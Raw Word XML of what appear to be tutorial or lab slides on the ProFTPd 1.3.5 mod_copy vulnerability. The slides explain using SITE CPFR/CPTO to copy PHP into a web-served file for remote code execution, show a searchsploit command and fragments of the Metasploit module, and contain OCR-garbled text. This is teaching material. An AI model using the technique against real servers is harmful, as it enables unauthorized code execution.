                            <a:ext cx="848773" cy="3800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D067C64" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="54"/>
                                </w:rPr>
                                <w:t xml:space="preserve">And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9710" name="Rectangle 109710"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1428750" y="0"/>
                            <a:ext cx="1925574" cy="3800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9F40732" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="52"/>
                                </w:rPr>
                                <w:t xml:space="preserve">eventually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9711" name="Rectangle 109711"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2876550" y="0"/>
                            <a:ext cx="798100" cy="3800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81A7C7C" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="52"/>
                                </w:rPr>
                                <w:t>fails!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F439AA8" id="Group 334117" o:spid="_x0000_s1043" style="width:873pt;height:372.75pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="110871,47339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On7V91+0b&#10;cGy0T4IaV4ak07VLKa31DWtXnMVzpkpO1ZIv3gB+U5B8t8FenQV2X7LXwB0/9mf4JaB4EspxfXFo&#10;rT39+F2/aruQ7pZMemflXPIVVBr1m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H9Fv7P/wAuh17DM37pceleNfANv+JH&#10;+NevTSful57UARSSbQKhZs02Z+nNRb/egqw6Rqijk+WT25psj+9RI/E30oE0Qu+GNR+YKazEt+FR&#10;7vegaR/NJRRRQS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P3I+Ct4E0n&#10;mMGvTZNSj27RbruJ6mvJPgzJ/wASnrXpLNkg9eadwNe/vo1kXdbISUBqhHfQqW32ykH0pdSYebHy&#10;P9WKoSMVUsBnApiNS3uLX7Dd5i2cAcVFZWdncnzPMZVQZIbpTLW3ml0+6cR5+7wahuphp+mwBkxJ&#10;K53D0oAluIft3MdwDEvCxniqZsJP4WjA+tUYbpZvkjQ7h74qk/mq7A7+vrTGfg9RRR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B+23wbZf7KPGSa9Qt7NrhWYjyo&#10;kHJ9a4b4E2UFvoxubpSyltic9DXokw87Wms7mbyIs4AAxup2FcTVZrW3+zlYRMPLGGJxWdda00aA&#10;LEik9BjNaWr6RHcaxbW4J8lEJwPQVR1bS4JrW2mty8aMSnXvTEJJeyXmkzOJSjF1Hy8EVmK8jQ7Z&#10;2MhXKhmPJHrW3qGjxaTpMCK/nNMwbrmq1zo8ltYJeylVjdtm0UAZUduqKChz2p3Iq21lOsDzrFi3&#10;UgFvrVSTbuOwSSL2ZUpWHc/BGiiikM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">
                <v:shape id="Picture 340765" o:spid="_x0000_s1044" type="#_x0000_t75" style="position:absolute;top:762;width:110871;height:465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">
                  <v:imagedata r:id="rId80" o:title=""/>
                </v:shape>
                <v:rect id="Rectangle 109709" o:spid="_x0000_s1045" style="position:absolute;left:7905;width:8488;height:3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" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="2D067C64" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                        <w:r>
                          <w:rPr>
                            <w:sz w:val="54"/>
                          </w:rPr>
                          <w:t xml:space="preserve">And </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 109710" o:spid="_x0000_s1046" style="position:absolute;left:14287;width:19256;height:3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" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="39F40732" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                        <w:r>
                          <w:rPr>
                            <w:sz w:val="52"/>
                          </w:rPr>
                          <w:t xml:space="preserve">eventually </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 109711" o:spid="_x0000_s1047" style="position:absolute;left:28765;width:7981;height:3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" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="581A7C7C" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                        <w:r>
                          <w:rPr>
                            <w:sz w:val="52"/>
                          </w:rPr>
                          <w:t>fails!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0ECDA8EA" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="3"/>
        <w:ind w:left="10" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="70"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The gist of the exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D5DC39" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="111" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>The mod_ copy plugin for this version of ProFTPd allows commands site cpfr and site cpto, which can be used to copy files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616E278F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="226" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>It is possible to copy data from our input (/proc/se1f/fd/3 as attempted) to a file that can be accessed on the website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F08346" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="965" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Because there is a web server with PHP running, and we can supply arbitrary PHP, we can achieve Remote Code Execution!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE8FB9A" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="15228" w:right="-1305"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63B48234" wp14:editId="1EF3FD74">
            <wp:extent cx="1363980" cy="1036320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="116728" name="Picture 11672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728" name="Picture 116728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363980" cy="1036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0947B8" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="3"/>
        <w:ind w:left="31" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="70"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">So why didn't </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="70"/>
        </w:rPr>
        <w:t>that exploit script work?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A113297" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>We can connect to the service manually and try to run those commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CE8F0B" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="656"/>
        <w:ind w:left="-84" w:right="-435"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="114F0896" wp14:editId="200913DF">
            <wp:extent cx="10534650" cy="2019300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="340766" name="Picture 34076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766" name="Picture 340766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10534650" cy="201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5257B6" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="311" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>During testing, we receive a Permission denied error!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FBBC3C" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="5" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Could this exploit be done in any other way?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="174C2064" wp14:editId="5E834FA7">
            <wp:extent cx="1409700" cy="1066800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="123403" name="Picture 12340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403" name="Picture 123403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409700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pPr w:vertAnchor="text" w:tblpX="-105" w:tblpY="1980"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="16633" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="488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17485"/>
      </w:tblGrid>
      <w:tr w:rsidR="007A5F0C" w14:paraId="39F91CCC" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="6249"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16633" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4870F87A" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="109"/>
              <w:ind w:left="351"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="52"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>def initialize(info =</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30F94061" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="37"/>
              <w:ind w:left="891"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
              </w:rPr>
              <w:t>super (update_i nfo(info,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65279DD5" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="center" w:pos="1746"/>
                <w:tab w:val="center" w:pos="8398"/>
              </w:tabs>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="30"/>
              </w:rPr>
              <w:tab/>
              <w:t>'Name '</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="30"/>
              </w:rPr>
              <w:tab/>
              <w:t>'ProFTPD 1.3.5 Mod_Copy Command Execution'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BDED0FE" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="1296"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="44"/>
              </w:rPr>
              <w:t>'Description '</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E04673A" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="-204" w:right="-848"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <mc:AlternateContent>
                <mc:Choice Requires="wpg">
                  <w:drawing>
                    <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E93A3C4" wp14:editId="30FE77D6">
                      <wp:extent cx="11229975" cy="2667000"/>
                      <wp:effectExtent l="0" t="0" r="0" b="0"/>
                      <wp:docPr id="334898" name="Group 33489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1229975" cy="2667000"/>
                                <a:chOff x="0" y="0"/>
                                <a:chExt cx="11229975" cy="266700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40768" name="Picture 340768"/>
                                <pic:cNvPicPr/>
                              </pic:nvPicPr>
                              <pic:blipFill>
                                <a:blip r:embed="rId8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190500"/>
                                  <a:ext cx="11229975" cy="24765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123596" name="Rectangle 123596"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="1352550" y="0"/>
                                  <a:ext cx="707303" cy="278702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5F30DD88" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                                    <w:r>
                                      <w:rPr>
                                        <w:sz w:val="42"/>
                                      </w:rPr>
                                      <w:t xml:space="preserve">This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123597" name="Rectangle 123597"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="1914525" y="19050"/>
                                  <a:ext cx="1011341" cy="240697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1979AAAA" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                                    <w:r>
                                      <w:rPr>
                                        <w:sz w:val="34"/>
                                      </w:rPr>
                                      <w:t xml:space="preserve">module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123598" name="Rectangle 123598"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="2686050" y="0"/>
                                  <a:ext cx="1302711" cy="278702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4C4B9B3A" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                                    <w:r>
                                      <w:rPr>
                                        <w:sz w:val="46"/>
                                      </w:rPr>
                                      <w:t xml:space="preserve">exploits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123599" name="Rectangle 123599"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="3676650" y="0"/>
                                  <a:ext cx="593289" cy="278702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22812DF" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                                    <w:r>
                                      <w:rPr>
                                        <w:sz w:val="42"/>
                                      </w:rPr>
                                      <w:t xml:space="preserve">the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123600" name="Rectangle 123600"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="4133850" y="0"/>
                                  <a:ext cx="707303" cy="278702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9ACC2B9" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                                    <w:r>
                                      <w:rPr>
                                        <w:sz w:val="42"/>
                                      </w:rPr>
                                      <w:t xml:space="preserve">SITE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123601" name="Rectangle 123601"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="4686300" y="19050"/>
                                  <a:ext cx="1480067" cy="21536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5CA82321" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                                    <w:r>
                                      <w:rPr>
                                        <w:sz w:val="36"/>
                                      </w:rPr>
                                      <w:t xml:space="preserve">CPFR/CPTO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123602" name="Rectangle 123602"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="5800725" y="19050"/>
                                  <a:ext cx="1302711" cy="240697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172F07B2" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                                    <w:r>
                                      <w:rPr>
                                        <w:sz w:val="32"/>
                                      </w:rPr>
                                      <w:t xml:space="preserve">commands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123603" name="Rectangle 123603"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="6800850" y="0"/>
                                  <a:ext cx="428602" cy="278702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558BA04" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                                    <w:r>
                                      <w:rPr>
                                        <w:sz w:val="56"/>
                                      </w:rPr>
                                      <w:t xml:space="preserve">in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123604" name="Rectangle 123604"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="7134225" y="19050"/>
                                  <a:ext cx="1176029" cy="21536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5B19B3B0" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                                    <w:r>
                                      <w:rPr>
                                        <w:sz w:val="36"/>
                                      </w:rPr>
                                      <w:t xml:space="preserve">ProFTPD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123605" name="Rectangle 123605"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="8020050" y="0"/>
                                  <a:ext cx="1163361" cy="278702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5BB2DBBE" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                                    <w:r>
                                      <w:rPr>
                                        <w:sz w:val="42"/>
                                      </w:rPr>
                                      <w:t xml:space="preserve">version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123606" name="Rectangle 123606"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="8915400" y="0"/>
                                  <a:ext cx="823436" cy="278702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ECF668D" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                                    <w:r>
                                      <w:rPr>
                                        <w:sz w:val="46"/>
                                      </w:rPr>
                                      <w:t>1.3.5.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E93A3C4" id="Group 334898" o:spid="_x0000_s1048" style="width:884.25pt;height:210pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="112299,26670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">
                      <v:shape id="Picture 340768" o:spid="_x0000_s1049" type="#_x0000_t75" style="position:absolute;top:1905;width:112299;height:247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">
                        <v:imagedata r:id="rId83" o:title=""/>
                      </v:shape>
                      <v:rect id="Rectangle 123596" o:spid="_x0000_s1050" style="position:absolute;left:13525;width:7073;height:27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" filled="f" stroked="f">
                        <v:textbox inset="0,0,0,0">
                          <w:txbxContent>
                            <w:p w14:paraId="5F30DD88" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="42"/>
                                </w:rPr>
                                <w:t xml:space="preserve">This </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </v:textbox>
                      </v:rect>
                      <v:rect id="Rectangle 123597" o:spid="_x0000_s1051" style="position:absolute;left:19145;top:190;width:10113;height:24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" filled="f" stroked="f">
                        <v:textbox inset="0,0,0,0">
                          <w:txbxContent>
                            <w:p w14:paraId="1979AAAA" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="34"/>
                                </w:rPr>
                                <w:t xml:space="preserve">module </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </v:textbox>
                      </v:rect>
                      <v:rect id="Rectangle 123598" o:spid="_x0000_s1052" style="position:absolute;left:26860;width:13027;height:27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" filled="f" stroked="f">
                        <v:textbox inset="0,0,0,0">
                          <w:txbxContent>
                            <w:p w14:paraId="4C4B9B3A" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="46"/>
                                </w:rPr>
                                <w:t xml:space="preserve">exploits </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </v:textbox>
                      </v:rect>
                      <v:rect id="Rectangle 123599" o:spid="_x0000_s1053" style="position:absolute;left:36766;width:5933;height:27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" filled="f" stroked="f">
                        <v:textbox inset="0,0,0,0">
                          <w:txbxContent>
                            <w:p w14:paraId="022812DF" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="42"/>
                                </w:rPr>
                                <w:t xml:space="preserve">the </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </v:textbox>
                      </v:rect>
                      <v:rect id="Rectangle 123600" o:spid="_x0000_s1054" style="position:absolute;left:41338;width:7073;height:27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" filled="f" stroked="f">
                        <v:textbox inset="0,0,0,0">
                          <w:txbxContent>
                            <w:p w14:paraId="09ACC2B9" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="42"/>
                                </w:rPr>
                                <w:t xml:space="preserve">SITE </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </v:textbox>
                      </v:rect>
                      <v:rect id="Rectangle 123601" o:spid="_x0000_s1055" style="position:absolute;left:46863;top:190;width:14800;height:21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" filled="f" stroked="f">
                        <v:textbox inset="0,0,0,0">
                          <w:txbxContent>
                            <w:p w14:paraId="5CA82321" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="36"/>
                                </w:rPr>
                                <w:t xml:space="preserve">CPFR/CPTO </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </v:textbox>
                      </v:rect>
                      <v:rect id="Rectangle 123602" o:spid="_x0000_s1056" style="position:absolute;left:58007;top:190;width:13027;height:24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" filled="f" stroked="f">
                        <v:textbox inset="0,0,0,0">
                          <w:txbxContent>
                            <w:p w14:paraId="172F07B2" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="32"/>
                                </w:rPr>
                                <w:t xml:space="preserve">commands </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </v:textbox>
                      </v:rect>
                      <v:rect id="Rectangle 123603" o:spid="_x0000_s1057" style="position:absolute;left:68008;width:4286;height:27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" filled="f" stroked="f">
                        <v:textbox inset="0,0,0,0">
                          <w:txbxContent>
                            <w:p w14:paraId="7558BA04" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="56"/>
                                </w:rPr>
                                <w:t xml:space="preserve">in </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </v:textbox>
                      </v:rect>
                      <v:rect id="Rectangle 123604" o:spid="_x0000_s1058" style="position:absolute;left:71342;top:190;width:11760;height:21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" filled="f" stroked="f">
                        <v:textbox inset="0,0,0,0">
                          <w:txbxContent>
                            <w:p w14:paraId="5B19B3B0" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="36"/>
                                </w:rPr>
                                <w:t xml:space="preserve">ProFTPD </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </v:textbox>
                      </v:rect>
                      <v:rect id="Rectangle 123605" o:spid="_x0000_s1059" style="position:absolute;left:80200;width:11634;height:27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" filled="f" stroked="f">
                        <v:textbox inset="0,0,0,0">
                          <w:txbxContent>
                            <w:p w14:paraId="5BB2DBBE" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="42"/>
                                </w:rPr>
                                <w:t xml:space="preserve">version </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </v:textbox>
                      </v:rect>
                      <v:rect id="Rectangle 123606" o:spid="_x0000_s1060" style="position:absolute;left:89154;width:8234;height:27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" filled="f" stroked="f">
                        <v:textbox inset="0,0,0,0">
                          <w:txbxContent>
                            <w:p w14:paraId="0ECF668D" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="46"/>
                                </w:rPr>
                                <w:t>1.3.5.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</w:tr>
    </w:tbl>
    <w:p w14:paraId="24D29A59" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="16" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251688960" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="2D481A4B" wp14:editId="42258903">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>11772900</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5000625</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="9525" cy="9525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="127235" name="Picture 12723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235" name="Picture 127235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89984" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="350602CB" wp14:editId="42A60342">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-53339</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1143000</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="10515600" cy="114300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="127206" name="Picture 12720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206" name="Picture 127206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10515600" cy="114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68"/>
        </w:rPr>
        <w:t>Analyze the Metasploit module</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="16523" w:type="dxa"/>
        <w:tblInd w:w="-69" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="45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16523"/>
      </w:tblGrid>
      <w:tr w:rsidR="007A5F0C" w14:paraId="1F767E2C" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="609"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1652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3E7812D0" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="center" w:pos="7178"/>
              </w:tabs>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="46"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>root@kali</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="46"/>
              </w:rPr>
              <w:tab/>
              <w:t>searchsploit -x exploits/1inux/remote/37262. rb</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1FD311D6" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F600CE4" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="16" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251691008" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="75D7C8D3" wp14:editId="72403C49">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>11515725</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5133975</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="9525" cy="9525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="128217" name="Picture 1282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217" name="Picture 128217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92032" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="2555C39E" wp14:editId="663E4B0E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>11315700</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5181600</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="9525" cy="9525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="128218" name="Picture 1282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218" name="Picture 128218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68"/>
        </w:rPr>
        <w:t>Important Variables</w:t>
      </w:r>
    </w:p>
